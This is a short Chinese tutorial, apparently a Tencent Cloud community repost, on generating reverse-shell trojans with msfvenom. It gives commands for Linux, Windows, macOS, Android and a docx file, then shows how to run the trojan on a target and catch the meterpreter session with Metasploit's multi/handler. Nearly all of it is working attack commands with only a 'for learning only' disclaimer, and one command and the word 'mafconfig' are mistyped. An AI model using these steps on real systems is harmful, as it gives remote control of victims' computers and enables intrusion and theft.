打开终端并输入以下命令:msfvenom -p [payload] LHOST=[IP地址] LPORT=[端口号] -f [格式] -o [文件名]
将[payload]替换为你想要使用的载荷类型,例如linux/x86/meterpreter/reverse_tcp。
将[IP地址]替换为你的IP地址。
将[端口号]替换为你想要使用的端口号。
将[格式]替换为你想要使用的文件格式。
将[文件名]替换为你想要使用的文件名。
例如,如果你想生成一个反向连接的Linux,可以使用以下命令:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f elf -o linux.elf
因为系统的不同,命令存在一定差异。
window系统
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f exe -o windows.exe
苹果系统
msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f macho -o mac.macho
安卓系统
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 R > /root/安卓.apk
你甚至可以使用以下命令来生成一个反向链接的docx文档:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4444 -f docx > office.docx
最后我们来测试一下,通过在kali上运行
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.1LPORT=4444-f exe -o windows.exe
得到生成的名为windows.exe的木马程序。
把生成的windows.exe木马文件拖放到windows靶机上,运行。
我们在kali运行mafconfig,后运行
use exploit/multi/handler
设置好端口和ip(ip和端口都是kali的)。
set lport 设置端口,命令中开放的端口
set lhost 设置ip,填写kali的ip
set payload 设置荷载方式
荷载方式就是
msfvenom -p [payload] LHOST=[IP地址] LPORT=[端口号] -f [格式] -o [文件名]
中填写在[payload]位置的命令。
最后在输入run就可以了。
本篇文章就到此结束了,注,本文章只能用于学习,生成的木马文件不得传播,传播后造成损失的将会按照法律依法处理。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。